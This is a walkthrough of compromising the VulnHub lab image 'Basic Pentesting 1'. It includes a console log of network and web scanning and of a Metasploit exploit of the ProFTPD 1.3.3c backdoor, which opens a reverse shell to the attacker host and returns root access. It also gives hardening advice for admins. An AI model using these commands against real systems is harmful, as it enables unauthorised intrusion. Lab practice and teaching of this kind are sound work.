In this walk through we’ll look at how to compromise the simple VulnHub image, ‘Basic Pentesting 1’, released by Josiah Pierce. The aim is to get Root privileges on the machine.
Details about the image and how to download it can all be found on the vulnhub website – https://www.vulnhub.com/entry/basic-pentesting-1,216/
Once the image has been downloaded and opened, it immediately gives away an OS type, version and a username. We can note these down for use later on.
To start our reconnaissance we need to find the IP address of the target;
This identifies 192.168.86.128 as being the IP address we need. Note this is based on local DHCP so you will likely have a different target IP Address and MAC Address.
Now we know what we’re aiming for, let’s perform some basic recon and see what services are running.
We can note down the various services and software types for reference later, but for now we can start with the web service on TCP 80 as these are often low-hanging fruit.
It looks like there is a very basic website and if you look at the source code, nothing obviously exploitable;
Let’s see if there are any hidden sites available to us by using Directory Buster;
Success. I tried to have a poke around the site but it was really slow to respond. Unsure if this is a deliberate ‘feature# or not I left the page to ponder its self while I looked at other services on the machine. Earlier on we found an FTP service called ProFTPD v1.3.3.c – let’s see if there are any known vulnerabilities on the exploit-database.
Bingo! Upon reviewing the exploits, one of them explains that some ‘enterprising’ people hacked the source code associated with this release and inserted a backdoor. The code was compiled and released by the publisher before they spotted the issue. These exploits make use of that backdoor. In the interest of saving time, I thought I’d try and go for a quick win with Metasploit rather than reverse engineering the code to build my own exploit.
Fire up msfconsole and identify the exploit module;
Then configure the module, in this case by identifying the IP address of the target.
The exploit was successful and even more luckily for us, the FTP Server was running as Root so that’s it, game over.
What are the morals of the story here for Security conscious admins?
- Only run services you really need. If you don’t need it, turn it off to reduce the potential attack surface.
- Keep your software up to date and review release notes and security resource like CVE and Exploit DB for vulnerabilities – this version of ProFTPD is several years old so no excuse for not having spotted the issue.
- Only run services with suitably privileged accounts. It seems unlikely that an FTP demon really needs to be run as root. It could have quite easily been run as a Service account with lower privileges which would have made the process of compromising the machine much harder.
And what are the morals of the story for the Penetration Tester?
- Be thorough in your enumeration, note down what you see
- Don’t get dragged down the rabbit hole early on, keep looking for low hanging fruit before committing lots of time to something
- Use metasploit by all means, but understand what is going on and why. Could you have reverse engineered the module it to create your own version of the exploit if needed?
Command line I/O from this attack (edited for clarity);
root@kali:~# netdiscover -r 192.168.86.0/24 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.86.1 00:50:56:c0:00:01 1 60 VMware, Inc. 192.168.86.128 00:0c:29:ca:f6:ba 1 60 VMware, Inc. 192.168.86.254 00:50:56:fc:1f:cf 1 60 VMware, Inc. root@kali:~# ifconfig eth0: flags=4163<up,broadcast,running,multicast> mtu 1500 inet 192.168.86.129 netmask 255.255.255.0 broadcast 192.168.86.255 **SNIP** root@kali:~# nmap -n -v -Pn -p- -sV 192.168.86.128 Starting Nmap 7.60 ( https://nmap.org ) at 2018-02-07 13:44 GMT NSE: Loaded 42 scripts for scanning. Initiating ARP Ping Scan at 13:44 Scanning 192.168.86.128 [1 port] Completed ARP Ping Scan at 13:44, 0.04s elapsed (1 total hosts) Initiating SYN Stealth Scan at 13:44 Scanning 192.168.86.128 [65535 ports] Discovered open port 80/tcp on 192.168.86.128 Discovered open port 22/tcp on 192.168.86.128 Discovered open port 21/tcp on 192.168.86.128 Completed SYN Stealth Scan at 13:44, 5.72s elapsed (65535 total ports) Initiating Service scan at 13:44 Scanning 3 services on 192.168.86.128 Completed Service scan at 13:45, 10.01s elapsed (3 services on 1 host) NSE: Script scanning 192.168.86.128. Initiating NSE at 13:45 Completed NSE at 13:45, 0.02s elapsed Initiating NSE at 13:45 Completed NSE at 13:45, 0.00s elapsed Nmap scan report for 192.168.86.128 Host is up (0.0018s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.3c 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) MAC Address: 00:0C:29:CA:F6:BA (VMware) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB) root@kali:~# dirb http://192.168.86.128 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Wed Feb 7 13:48:39 2018 URL_BASE: http://192.168.86.128/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.86.128/ ---- + http://192.168.86.128/index.html (CODE:200|SIZE:177) ==> DIRECTORY: http://192.168.86.128/secret/ + http://192.168.86.128/server-status (CODE:403|SIZE:302) ---- Entering directory: http://192.168.86.128/secret/ ---- + http://192.168.86.128/secret/index.php (CODE:301|SIZE:0) ==> DIRECTORY: http://192.168.86.128/secret/wp-admin/ ==> DIRECTORY: http://192.168.86.128/secret/wp-content/ ==> DIRECTORY: http://192.168.86.128/secret/wp-includes/ + http://192.168.86.128/secret/xmlrpc.php (CODE:405|SIZE:42) ---- Entering directory: http://192.168.86.128/secret/wp-admin/ ---- + http://192.168.86.128/secret/wp-admin/admin.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.86.128/secret/wp-admin/css/ ==> DIRECTORY: http://192.168.86.128/secret/wp-admin/images/ ==> DIRECTORY: http://192.168.86.128/secret/wp-admin/includes/ + http://192.168.86.128/secret/wp-admin/index.php (CODE:302|SIZE:0) ==> DIRECTORY: http://192.168.86.128/secret/wp-admin/js/ ==> DIRECTORY: http://192.168.86.128/secret/wp-admin/maint/ ==> DIRECTORY: http://192.168.86.128/secret/wp-admin/network/ ==> DIRECTORY: http://192.168.86.128/secret/wp-admin/user/ **SNIP** root@kali:~#searchsploit proftpd 1.3.3ct ProFTPd 1.3.3c - Compromised Source Backdoor Remote Code Execution ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit) endroot@kali:~# msfconsole msf > search proftpd Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) exploit/linux/ftp/proftp_sreplace 2006-11-26 great ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) exploit/linux/misc/netsupport_manager_agent 2011-01-08 average NetSupport Manager Agent Remote Buffer Overflow exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent ProFTPD-1.3.3c Backdoor Command Execution exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent ProFTPD 1.3.5 Mod_Copy Command Execution msf > use exploit/unix/ftp/proftpd_133c_backdoor msf exploit(unix/ftp/proftpd_133c_backdoor) > show options Module options (exploit/unix/ftp/proftpd_133c_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 21 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Automatic msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 192.168.86.128 rhost => 192.168.86.128 msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit [*] Started reverse TCP double handler on 192.168.86.129:4444 [*] 192.168.86.128:21 - Sending Backdoor Command [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo uGd9Cl4X4B1LGV5c; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "uGd9Cl4X4B1LGV5c\r\n" [*] Matching... [*] A is input... [*] Command shell session 1 opened (192.168.86.129:4444 -> 192.168.86.128:57980) at 2018-02-07 13:59:56 +0000 id uid=0(root) gid=0(root) groups=0(root),65534(nogroup)</up,broadcast,running,multicast>